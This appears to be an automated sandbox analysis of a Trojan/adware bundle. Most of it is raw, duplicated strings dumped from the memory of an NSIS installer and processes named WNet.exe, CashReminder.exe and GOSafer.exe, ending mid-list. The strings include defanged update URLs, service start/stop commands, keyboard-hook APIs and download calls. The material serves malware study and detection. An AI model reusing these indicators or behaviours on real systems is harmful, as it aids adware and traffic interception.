.........W..8......9t.D........V.d)...s.. ..4.v~r{~..*..&..}............D../TE.t.&V.e.........l..1........y...--=|~..z..3j1..\..<..~..6.[.Z}'.@.0l._...,r..T...W.K.<.<m...;z...k.=F..5........|Z..g.!......p...!.

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1512:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

unpacking data: %d%%

unpacking data: %d%%

... %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

ShowWebInPopUp

ShowWebInPopUp

pData\Local\Temp\nscD154.tmp\nsWeb.dll

pData\Local\Temp\nscD154.tmp\nsWeb.dll

ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe

ai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_gs.exe

t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR

t.com/index.php /ta /ci 9664 /i MyBestOffersTodayBR

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp\nsWeb.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nscD154.tmp

n%D,3

n%D,3

GetProcessHeap

GetProcessHeap

OLEAUT32.dll

OLEAUT32.dll

CreateURLMoniker

CreateURLMoniker

urlmon.dll

urlmon.dll

WININET.dll

WININET.dll

nsWeb.dll

nsWeb.dll

ShowWebInPage

ShowWebInPage

MSHTML.DLL

MSHTML.DLL

1 1$1(1,1014181

1 1$1(1,1014181

t%SSj

t%SSj

GetWindowsDirectoryW

GetWindowsDirectoryW

RegEnumKeyExW

RegEnumKeyExW

RegEnumKeyExA

RegEnumKeyExA

RegCreateKeyExW

RegCreateKeyExW

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

registry.dll

registry.dll

_CopyKey

_CopyKey

_CreateKey

_CreateKey

_DeleteKey

_DeleteKey

_DeleteKeyEmpty

_DeleteKeyEmpty

_KeyExists

_KeyExists

_MoveKey

_MoveKey

_RestoreKey

_RestoreKey

_SaveKey

_SaveKey

.reloc

.reloc

System.dll

System.dll

callback%d

callback%d

@.reloc

@.reloc

8%ud'

8%ud'

.bu)o&

.bu)o&

g\=.jeD

g\=.jeD

nscD154.tmp

nscD154.tmp

pData\Local\Temp\nscD154.tmp

pData\Local\Temp\nscD154.tmp

00663296

00663296

c:\%original file name%.exe

c:\%original file name%.exe

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt

%original file name%.exe

%original file name%.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp

ers\"%CurrentUserName%"\AppData\Local\Temp\nsmD142.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

-2046754816

-2046754816

-2147410511

-2147410511

Nullsoft Install System v2.46

Nullsoft Install System v2.46

HKEY_DYN_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

HKEY_CLASSES_ROOT

%s /s "%s"

%s /s "%s"

regedit.exe

regedit.exe

REG_KEY

REG_KEY

%s%s%s

%s%s%s

x,

x,

=hex(%x):

=hex(%x):

=dword:x

=dword:x

="%s"

="%s"

[%s\%s]

[%s\%s]

[-%s\%s]

[-%s\%s]

Windows Registry Editor Version 5.00

Windows Registry Editor Version 5.00

5.9.1.7

5.9.1.7

%original file name%.exe_1512_rwx_003F4000_00001000:

callback%d

callback%d

g3CvT78vSMa0N0LPai7Qvt_mb_1.exe_1884:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

unpacking data: %d%%

unpacking data: %d%%

... %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

ShowWebInPopUp

ShowWebInPopUp

pData\Local\Temp\nssD4BE.tmp\nsWeb.dll

pData\Local\Temp\nssD4BE.tmp\nsWeb.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp\nsWeb.dll

%Program Files%

%Program Files%

\nsWeb.dll

\nsWeb.dll

hXXp://goo.gl/Bw14Po

hXXp://goo.gl/Bw14Po

$$\wininit.ini

$$\wininit.ini

@.reloc

@.reloc

n%D,3

n%D,3

GetProcessHeap

GetProcessHeap

OLEAUT32.dll

OLEAUT32.dll

CreateURLMoniker

CreateURLMoniker

urlmon.dll

urlmon.dll

WININET.dll

WININET.dll

nsWeb.dll

nsWeb.dll

ShowWebInPage

ShowWebInPage

MSHTML.DLL

MSHTML.DLL

1 1$1(1,1014181

1 1$1(1,1014181

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp

nssD4BE.tmp

nssD4BE.tmp

:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp

:\Users\"%CurrentUserName%"\AppData\Local\Temp\nssD4BE.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt\g3CvT78vSMa0N0LPai7Qvt_mb_1.exe

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Temp\Og3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt

g3CvT78vSMa0N0LPai7Qvt_mb_1.exe

g3CvT78vSMa0N0LPai7Qvt_mb_1.exe

ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp

ers\"%CurrentUserName%"\AppData\Local\Temp\nscD4AC.tmp

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\

8.9.3.9

8.9.3.9

WNet.exe_3080:

.idata

.idata

.rdata

.rdata

P.reloc

P.reloc

P.rsrc

P.rsrc

kernel32.dll

kernel32.dll

Windows

Windows

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

oleaut32.dll

EVariantBadIndexError

EVariantBadIndexError

ssShift

ssShift

htKeyword

htKeyword

EInvalidOperation

EInvalidOperation

u%CNu

u%CNu

%s[%d]

%s[%d]

%s_%d

%s_%d

EInvalidGraphicOperation

EInvalidGraphicOperation

USER32.DLL

USER32.DLL

comctl32.dll

comctl32.dll

uxtheme.dll

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

Proportional

Proportional

MAPI32.DLL

MAPI32.DLL

TURLAction

TURLAction

HelpKeywordp

HelpKeywordp

TURLDownloadStatus

TURLDownloadStatus

dsBeginSyncOperation

dsBeginSyncOperation

dsEndSyncOperation

dsEndSyncOperation

dsFilterReportMIMEType

dsFilterReportMIMEType

TDownLoadURL

TDownLoadURL

URLMON.DLL

URLMON.DLL

URLDownloadToFileA

URLDownloadToFileA

OnKeyDown

OnKeyDown

OnKeyPress

OnKeyPress

OnKeyUp

OnKeyUp

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

JumpID("","%s")

TKeyEvent

TKeyEvent

TKeyPressEvent

TKeyPressEvent

HelpKeywordT

HelpKeywordT

crSQLWait

crSQLWait

%s (%s)

%s (%s)

imm32.dll

imm32.dll

AutoHotkeys

AutoHotkeys

ssHotTrack

ssHotTrack

TWindowState

TWindowState

poProportional

poProportional

TWMKey

TWMKey

KeyPreview

KeyPreview

WindowState

WindowState

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

vcltest3.dll

User32.dll

User32.dll

Password

Password

OnExecutepWE

OnExecutepWE

127.0.0.1

127.0.0.1

255.0.0.0

255.0.0.0

ServiceExecute

ServiceExecute

\P_CheckUpdate.txt

\P_CheckUpdate.txt

NOVA UPDATE DISPONIVEL! URL:

NOVA UPDATE DISPONIVEL! URL:

\po_update.exe

\po_update.exe

hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=

hXXp://VVV.brsoftwarellc.com/services/update.php?v=

hXXp://VVV.brsoftwarellc.com/services/update.php?v=

&key=

&key=

\P_RuleList.txt

\P_RuleList.txt

[E] ProductKey :

[E] ProductKey :

[N] ProductKey :

[N] ProductKey :

cmd.exe /c net start WNet

cmd.exe /c net start WNet

cmd.exe /c net stop WNet

cmd.exe /c net stop WNet

user32.dll

user32.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ReportEventA

ReportEventA

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

WinExec

WinExec

GetCPInfo

GetCPInfo

version.dll

version.dll

gdi32.dll

gdi32.dll

SetViewportOrgEx

SetViewportOrgEx

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

LoadKeyboardLayoutA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyboardLayout

GetKeyState

GetKeyState

GetKeyNameTextA

GetKeyNameTextA

EnumWindows

EnumWindows

EnumThreadWindows

EnumThreadWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

wsock32.dll

wsock32.dll

nfapi.dll

nfapi.dll

nf_tcpDisableFiltering

nf_tcpDisableFiltering

nf_setTCPTimeout

nf_setTCPTimeout

nf_tcpClose

nf_tcpClose

nf_tcpPostReceive

nf_tcpPostReceive

nf_tcpPostSend

nf_tcpPostSend

nf_tcpSetConnectionState

nf_tcpSetConnectionState

psapi.dll

psapi.dll

ProtocolFilters.dll

ProtocolFilters.dll

5l6O6W6

5l6O6W6

?!?%?)?-?1?5?9?=?

?!?%?)?-?1?5?9?=?

5%6x6

5%6x6

1 1$1(1,1014181

1 1$1(1,1014181

0&0.080=0

0&0.080=0

2%3)3-31383

2%3)3-31383

; ;$;(;,;0;4;8;

; ;$;(;,;0;4;8;

1#1'1 1/13171;1

1#1'1 1/13171;1

=!=,=7=?=_=

=!=,=7=?=_=

5 5$5(5,505

5 5$5(5,505

3 3$3(3,3

3 3$3(3,3

3 3$3(3,3034383

3 3$3(3,3034383

333333333333333333

333333333333333333

33333833

33333833

3333339

3333339

3333333333333338

3333333333333338

:*"*"$3338

:*"*"$3338

3333333

3333333

33333333

33333333

33333333333

33333333333

3333333333338

3333333333338

33338?383

33338?383

333333333333

333333333333

:*3:"$3338

:*3:"$3338

333333333333333

333333333333333

I<.os8>

I<.os8>

KWindows

KWindows

UrlMon

UrlMon

OnExecute

OnExecute

No help keyword specified.

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

No help found for %s#No context-sensitive help installed$No topic-based help system installed

shutdown(Service failed in custom message(%d): %s

shutdown(Service failed in custom message(%d): %s

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Error downloading URL: %s

Error downloading URL: %s

Unable to load %s"Unable to find a Table of Contents

Unable to load %s"Unable to find a Table of Contents

Alt Clipboard does not support Icons

Alt Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

Cannot open clipboard/Menu '%s' is already being used by another form

Service failed on %s: %s

Service failed on %s: %s

Unsupported clipboard format

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error reading %s%s%s: %s

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to get data for '%s'

Failed to set data for '%s'

Failed to set data for '%s'

Resource %s not found

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Property %s does not exist

Thread creation error: %s

Thread creation error: %s

Thread Error: %s (%d)

Thread Error: %s (%d)

Class %s not found

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot create file "%s". %s

Cannot open file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

List index out of bounds (%d)

Ancestor for '%s' not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Operation not supported

External exception %x

External exception %x

Interface not supported

Interface not supported

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

!'%s' is not a valid integer value

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

CashReminder.exe_1108:

.idata

.idata

.rdata

.rdata

P.reloc

P.reloc

P.rsrc

P.rsrc

kernel32.dll

kernel32.dll

Windows

Windows

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

oleaut32.dll

EVariantBadIndexError

EVariantBadIndexError

ssShift

ssShift

htKeyword

htKeyword

EInvalidOperation

EInvalidOperation

u%CNu

u%CNu

%s[%d]

%s[%d]

%s_%d

%s_%d

EInvalidGraphicOperation

EInvalidGraphicOperation

USER32.DLL

USER32.DLL

comctl32.dll

comctl32.dll

uxtheme.dll

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

Proportional

Proportional

MAPI32.DLL

MAPI32.DLL

TURLAction

TURLAction

HelpKeywordp

HelpKeywordp

TURLDownloadStatus

TURLDownloadStatus

dsBeginSyncOperation

dsBeginSyncOperation

dsEndSyncOperation

dsEndSyncOperation

dsFilterReportMIMEType

dsFilterReportMIMEType

TDownLoadURL

TDownLoadURL

URLMON.DLL

URLMON.DLL

URLDownloadToFileA

URLDownloadToFileA

OnKeyDown

OnKeyDown

OnKeyPress

OnKeyPress

OnKeyUp

OnKeyUp

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

JumpID("","%s")

TKeyEvent

TKeyEvent

TKeyPressEvent

TKeyPressEvent

HelpKeywordT

HelpKeywordT

crSQLWait

crSQLWait

%s (%s)

%s (%s)

imm32.dll

imm32.dll

AutoHotkeys

AutoHotkeys

ssHotTrack

ssHotTrack

TWindowState

TWindowState

poProportional

poProportional

TWMKey

TWMKey

KeyPreview

KeyPreview

WindowState

WindowState

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

System\CurrentControlSet\Control\Keyboard Layouts\%.8x

vcltest3.dll

vcltest3.dll

User32.dll

User32.dll

Password

Password

OnExecutepWE

OnExecutepWE

content-security-policy-report-only

content-security-policy-report-only

127.0.0.1

127.0.0.1

255.0.0.0

255.0.0.0

ServiceExecute

ServiceExecute

\P_StoreList.txt

\P_StoreList.txt

\P_CheckUpdate.txt

\P_CheckUpdate.txt

\cr_update.exe

\cr_update.exe

hXXp://VVV.related.deals/services/rules?dummy=

hXXp://VVV.related.deals/services/rules?dummy=

hXXp://VVV.related.deals/services/stores?dummy=

hXXp://VVV.related.deals/services/stores?dummy=

hXXp://VVV.related.deals/services/update/

hXXp://VVV.related.deals/services/update/

\P_RuleList.txt

\P_RuleList.txt

[N] ProductKey :

[N] ProductKey :

cmd.exe /c net start CashReminder

cmd.exe /c net start CashReminder

cmd.exe /c net stop CashReminder

cmd.exe /c net stop CashReminder

user32.dll

user32.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ReportEventA

ReportEventA

RegFlushKey

RegFlushKey

RegCreateKeyExA

RegCreateKeyExA

WinExec

WinExec

GetCPInfo

GetCPInfo

version.dll

version.dll

gdi32.dll

gdi32.dll

SetViewportOrgEx

SetViewportOrgEx

UnhookWindowsHookEx

UnhookWindowsHookEx

SetWindowsHookExA

SetWindowsHookExA

MsgWaitForMultipleObjects

MsgWaitForMultipleObjects

MapVirtualKeyA

MapVirtualKeyA

LoadKeyboardLayoutA

LoadKeyboardLayoutA

GetKeyboardState

GetKeyboardState

GetKeyboardLayoutList

GetKeyboardLayoutList

GetKeyboardLayout

GetKeyboardLayout

GetKeyState

GetKeyState

GetKeyNameTextA

GetKeyNameTextA

EnumWindows

EnumWindows

EnumThreadWindows

EnumThreadWindows

ActivateKeyboardLayout

ActivateKeyboardLayout

wsock32.dll

wsock32.dll

nfapi.dll

nfapi.dll

nf_tcpDisableFiltering

nf_tcpDisableFiltering

nf_setTCPTimeout

nf_setTCPTimeout

nf_tcpClose

nf_tcpClose

nf_tcpPostReceive

nf_tcpPostReceive

nf_tcpPostSend

nf_tcpPostSend

nf_tcpSetConnectionState

nf_tcpSetConnectionState

psapi.dll

psapi.dll

ProtocolFilters.dll

ProtocolFilters.dll

5l6O6W6

5l6O6W6

?!?%?)?-?1?5?9?=?

?!?%?)?-?1?5?9?=?

5%6x6

5%6x6

1 1$1(1,1014181

1 1$1(1,1014181

0&0.080=0

0&0.080=0

2%3)3-31383

2%3)3-31383

; ;$;(;,;0;4;8;

; ;$;(;,;0;4;8;

1#1'1 1/13171;1

1#1'1 1/13171;1

=!=,=7=?=_=

=!=,=7=?=_=

5 5$5(5,505

5 5$5(5,505

3 3$3(3,3

3 3$3(3,3

3 3$3(3,3034383

3 3$3(3,3034383

333333333333333333

333333333333333333

33333833

33333833

3333339

3333339

3333333333333338

3333333333333338

:*"*"$3338

:*"*"$3338

3333333

3333333

33333333

33333333

33333333333

33333333333

3333333333338

3333333333338

33338?383

33338?383

333333333333

333333333333

:*3:"$3338

:*3:"$3338

333333333333333

333333333333333

KWindows

KWindows

UrlMon

UrlMon

OnExecute

OnExecute

No help keyword specified.

No help keyword specified.

No help found for %s#No context-sensitive help installed$No topic-based help system installed

No help found for %s#No context-sensitive help installed$No topic-based help system installed

shutdown(Service failed in custom message(%d): %s

shutdown(Service failed in custom message(%d): %s

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"

Error downloading URL: %s

Error downloading URL: %s

Unable to load %s"Unable to find a Table of Contents

Unable to load %s"Unable to find a Table of Contents

Alt Clipboard does not support Icons

Alt Clipboard does not support Icons

Cannot open clipboard/Menu '%s' is already being used by another form

Cannot open clipboard/Menu '%s' is already being used by another form

Service failed on %s: %s

Service failed on %s: %s

Unsupported clipboard format

Unsupported clipboard format

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window

Error reading %s%s%s: %s

Error reading %s%s%s: %s

Failed to get data for '%s'

Failed to get data for '%s'

Failed to set data for '%s'

Failed to set data for '%s'

Resource %s not found

Resource %s not found

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group

Property %s does not exist

Property %s does not exist

Thread creation error: %s

Thread creation error: %s

Thread Error: %s (%d)

Thread Error: %s (%d)

Class %s not found

Class %s not found

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates

Cannot create file "%s". %s

Cannot create file "%s". %s

Cannot open file "%s". %s

Cannot open file "%s". %s

Invalid stream format$''%s'' is not a valid component name

Invalid stream format$''%s'' is not a valid component name

Invalid data type for '%s' List capacity out of bounds (%d)

Invalid data type for '%s' List capacity out of bounds (%d)

List count out of bounds (%d)

List count out of bounds (%d)

List index out of bounds (%d)

List index out of bounds (%d)

Ancestor for '%s' not found

Ancestor for '%s' not found

Cannot assign a %s to a %s

Cannot assign a %s to a %s

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread

%s (%s, line %d)

%s (%s, line %d)

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

Abstract Error?Access violation at address %p in module '%s'. %s of address %p

System Error. Code: %d.

System Error. Code: %d.

Invalid variant operation%Invalid variant operation (%s%.8x)

Invalid variant operation%Invalid variant operation (%s%.8x)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)

Operation not supported

Operation not supported

External exception %x

External exception %x

Interface not supported

Interface not supported

Invalid pointer operation

Invalid pointer operation

Invalid class typecast0Access violation at address %p. %s of address %p

Invalid class typecast0Access violation at address %p. %s of address %p

Privileged instruction(Exception %s in module %s at %p.

Privileged instruction(Exception %s in module %s at %p.

Application Error1Format '%s' invalid or incompatible with argument

Application Error1Format '%s' invalid or incompatible with argument

No argument for format '%s'"Variant method calls not supported

No argument for format '%s'"Variant method calls not supported

!'%s' is not a valid integer value

!'%s' is not a valid integer value

I/O error %d

I/O error %d

Integer overflow Invalid floating point operation

Integer overflow Invalid floating point operation

GOSafer.exe_3284:

.idata

.idata

.rdata

.rdata

P.reloc

P.reloc

P.rsrc

P.rsrc

kernel32.dll

kernel32.dll

Windows

Windows

MSWHEEL_ROLLMSG

MSWHEEL_ROLLMSG

MSH_WHEELSUPPORT_MSG

MSH_WHEELSUPPORT_MSG

MSH_SCROLL_LINES_MSG

MSH_SCROLL_LINES_MSG

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)

oleaut32.dll

oleaut32.dll

EVariantBadIndexError

EVariantBadIndexError

ssShift

ssShift

htKeyword

htKeyword

EInvalidOperation

EInvalidOperation

u%CNu

u%CNu

%s[%d]

%s[%d]

%s_%d

%s_%d

EInvalidGraphicOperation

EInvalidGraphicOperation

USER32.DLL

USER32.DLL

comctl32.dll

comctl32.dll

uxtheme.dll

uxtheme.dll

%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

Proportional

Proportional

MAPI32.DLL

MAPI32.DLL

TURLAction

TURLAction

HelpKeywordp

HelpKeywordp

TURLDownloadStatus

TURLDownloadStatus

dsBeginSyncOperation

dsBeginSyncOperation

dsEndSyncOperation

dsEndSyncOperation

dsFilterReportMIMEType

dsFilterReportMIMEType

TDownLoadURL

TDownLoadURL

URLMON.DLL

URLMON.DLL

URLDownloadToFileA

URLDownloadToFileA

OnKeyDown

OnKeyDown

OnKeyPress

OnKeyPress

OnKeyUp

OnKeyUp

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")

JumpID("","%s")

JumpID("","%s")

TKeyEvent

TKeyEvent

TKeyPressEvent

TKeyPressEvent

HelpKeywordT

HelpKeywordT

crSQLWait

crSQLWait

%s (%s)

